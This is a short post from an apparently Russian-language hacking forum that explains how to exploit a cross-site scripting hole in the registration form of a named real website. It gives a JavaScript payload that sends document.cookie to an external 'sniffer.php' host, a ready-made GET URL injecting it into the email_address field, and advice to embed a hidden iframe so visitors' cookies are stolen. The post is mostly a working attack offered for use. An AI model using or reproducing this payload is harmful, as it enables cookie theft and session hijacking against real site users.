03.02.2012, 16:43
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]">(new Image()).src='http://site.com/sniffer.php?'+document.cookie[/COLOR][/COLOR]
Можно отправлять GET-запросом
Сообщение от None
http://vsetke.ru/registration/registration_form.jsp?email_address=">(new Image()).src='http://site.com/sniffer.php?'%2bdocument.cookie
Вставляешь на свой сайт скрытый фрейм
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"](new Image()).src='http://site.com/sniffer.php?'+document.cookie"[/COLOR][COLOR="#007700"]>[/COLOR][/COLOR]
Когда юзер зайдет на сайт, куки отправятся на сниффер. В IE и хроме этот вариант не сработает из-за фильтров.
p.s.:
В этом примере используется GET-запрос, потому что реализация атаки проще. Но если есть возможность, лучше использовать POST-запрос для эксплуатации XSS. |
|
|